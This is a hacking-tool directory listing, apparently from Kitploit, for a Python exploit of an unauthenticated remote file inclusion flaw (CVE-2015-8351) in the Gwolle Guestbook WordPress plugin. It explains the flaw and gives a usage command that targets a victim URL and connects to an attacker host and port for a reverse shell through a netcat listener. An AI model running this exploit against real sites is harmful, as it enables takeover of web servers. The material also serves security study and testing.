Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
exploit-CVE-2015-8351 — WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion | Kitploit
Tools/GitHubGitHub/g4sp4rcs/exploit-cve-2015-8351
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubg4sp4rcs/exploit-cve-2015-8351

exploit-CVE-2015-8351

WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion

View Repository
23 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Gwolle Guestbook WordPress Plugin RFI Exploit

This Python script exploits a critical Remote File Inclusion (RFI) vulnerability in the Gwolle Guestbook WordPress Plugin, which can be exploited by a non-authenticated attacker to include a remote PHP file and execute arbitrary code on the vulnerable system.

Vulnerability Details

HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from an arbitrary remote server and execute its content on the vulnerable web server. In order to do so, the attacker needs to place a malicious 'wp-load.php' file into their server document root and include the server's URL into the request.

Successful exploitation of this vulnerability can lead to the compromise of the entire WordPress installation, and may even lead to the entire web server's compromise.

Usage

The script requires three arguments:

  • Target URL: The URL of the vulnerable WordPress installation.
  • Attacker host: The IP address or hostname of the attacker's machine.
  • Attacker port: The port number where the attacker is listening for a reverse shell.

Example:

root@kitploit:~
python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORT

Note: You need to have a netcat listener open on the attacker machine on the specified port.

Disclaimer

This script is provided for educational purposes only. The author is not responsible for any damages caused by the misuse of this script.

Download Tool